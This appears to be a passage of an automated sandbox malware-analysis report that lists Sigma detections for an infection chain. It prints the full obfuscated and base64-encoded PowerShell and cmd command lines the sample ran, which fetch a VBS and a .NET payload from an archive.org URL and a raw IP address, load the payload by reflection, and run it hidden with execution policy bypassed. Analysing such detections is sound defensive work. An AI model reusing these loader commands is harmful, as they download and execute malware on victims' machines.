'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKyd
                      Sigma detected: Potential PowerShell Command Line Obfuscation
                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKyd
                      Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKyd
                      Sigma detected: Potentially Suspicious PowerShell Child Processes
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1600, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs" , ProcessId: 2472, ProcessName: wscript.exe
                      Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle
                      Sigma detected: Suspicious MSHTA Child Process
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICA
                      Sigma detected: WScript or CScript Dropper
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1600, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs" , ProcessId: 2472, ProcessName: wscript.exe
                      Sigma detected: Change PowerShell Policies to an Insecure Level
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 